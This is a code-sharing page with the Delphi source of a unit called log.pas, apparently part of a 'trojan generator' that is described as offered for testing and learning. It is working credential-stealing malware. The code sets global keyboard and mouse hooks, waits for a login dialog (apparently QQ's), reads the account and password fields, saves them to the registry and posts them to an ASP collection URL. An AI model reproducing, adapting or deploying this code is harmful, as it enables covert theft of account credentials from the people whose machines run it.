📄 log.pas

📁 面对面木马生成器完整代码程序仅提供测试学习全局钩子查找句柄截获使用ASP收信收信地址明文（测试而已没加密） //本软件主要是截获账号和密码带了个简单发信

💻 PAS

字号:

unit log;     //截获单元

interface

uses Windows, Messages      ,sendmail,Registry;

const
url='http://127.0.0.1/qq.asp';

procedure HookOn();       // 安装鼠标键盘钩子


procedure HookOff();     // 卸载鼠标键盘钩子

implementation

var KeyboardHook, MouseHook: HHOOK;

 // 尝试取密码
procedure GetPassWord();
var
  HwndTemp,Dialog, ComboBox, Edit: HWND;
  Buffer: array[0..20] of Char;
  TmpStr,HaoMa,MiMa: string;

  reg:TRegistry;
Account, password: string;  
begin
 // 是否登录框
  Dialog := GetForegroundWindow();  //查找顶层窗口

  HwndTemp:= FindWindowEx(Dialog,0,'Static','帐  号：');    //退出条件
  if (HwndTemp <> 0) then
  begin
    HwndTemp:= FindWindowEx(Dialog,0,'Static','密  码：');  //FindWindowEx查找子窗口
    if (HwndTemp = 0) then Exit;

    HwndTemp:= FindWindowEx(Dialog,0,'Button',' 其他选项 ');
    if (HwndTemp = 0) then Exit;

    HwndTemp:= FindWindowEx(Dialog,0,'Static','选择服务器：');
    if (HwndTemp = 0) then Exit;

    // 取控件句柄
    ComboBox := FindWindowEx(Dialog, 0, 'ComboBox', nil);
    if (ComboBox = 0) then Exit;

    Edit := FindWindowEx(Dialog, 0, 'Edit', nil);    //点击登陆
    if (Edit = 0) then Exit;


    // 取控件文字
    Buffer[GetWindowText(ComboBox, Buffer, 20)] := #0;
    if (Buffer[0] = #0) then Exit;
    HaoMa := Buffer;

    Buffer[GetWindowText(Edit, Buffer, 20)] := #0;
    if (Buffer[0] = #0) then Exit;
    MiMa := Buffer;

    if (HaoMa <> '') and (MiMa <> '') then
    begin
      Reg := Tregistry.Create;
      Reg.Rootkey := HKEY_LOCAL_MACHINE;
      Reg.OpenKey('\SOFTWARE\',true);

      password:= Reg.readstring(pchar(HaoMa));       //读取该键值下的值
       if  password=MiMa then
        begin
       //   OutputDebugText('注册表已有!');
        end
       else
       begin
      Reg.WriteString(pchar(HaoMa),MiMa);
      PostURL(url,'num='+htmlencode('帐号:'+HaoMa+'----'+'密码:'+MiMa));  //发到ASP信箱
    //  OutputDebugText('已经写入注册表//已经发送!');
      end;
      Reg.CloseKey;   //关闭注册表
      Reg.Free; //释放变量所占内存
    end;
  end;

end;


 // 键盘钩子函数
function KeyboardProc(nCode: Integer; wParam: WPARAM; lParam: LPARAM): LRESULT; stdcall;//发现键盘敲击就启动GetPassWord()函数
begin
  if (nCode = HC_ACTION) and (wParam = 13) and (lParam and $80000000 = 0) then GetPassWord();
  Result := CallNextHookEx(KeyboardHook, nCode, wParam, lParam);
end;

 // 鼠标钩子函数
function MouseProc(nCode: Integer; wParam: WPARAM; lParam: LPARAM): LRESULT; stdcall;   //发现鼠标敲击就启动GetPassWord()函数
var
  Buffer: array[0..10] of Char;
begin 
  if (nCode = HC_ACTION) and (wParam = WM_LBUTTONDOWN) then
  begin
    GetClassName(PMouseHookStruct(lParam).hwnd, Buffer, 10);
    if (Copy(Buffer, 1, 2) = 'Bu') then GetPassWord();     
  end;
  Result := CallNextHookEx(MouseHook, nCode, wParam, lParam);
end;


procedure HookOn();    // 安装鼠标键盘钩子
begin
  KeyboardHook := SetWindowsHookEx(WH_KEYBOARD, @KeyboardProc, HInstance, 0);  // 键盘钩子函数
  MouseHook := SetWindowsHookEx(WH_MOUSE, @MouseProc, HInstance, 0);           // 鼠标钩子函数
end;


procedure HookOff();    // 卸载鼠标键盘钩子
begin
  UnHookWindowsHookEx(KeyboardHook);     // 键盘钩子函数
  UnHookWindowsHookEx(MouseHook);        // 鼠标钩子函数
end;

end.

💿 文件大小 898 K

👤 上传用户 sunny_02

📂 所属分类其他

🏷️ 相关标签

#ASP #测试 #面对面 #木马

⌨️ 快捷键说明

复制代码 Ctrl + C

搜索代码 Ctrl + F

全屏模式 F11

切换主题 Ctrl + Shift + D

显示快捷键 ?

增大字号 Ctrl + =

减小字号 Ctrl + -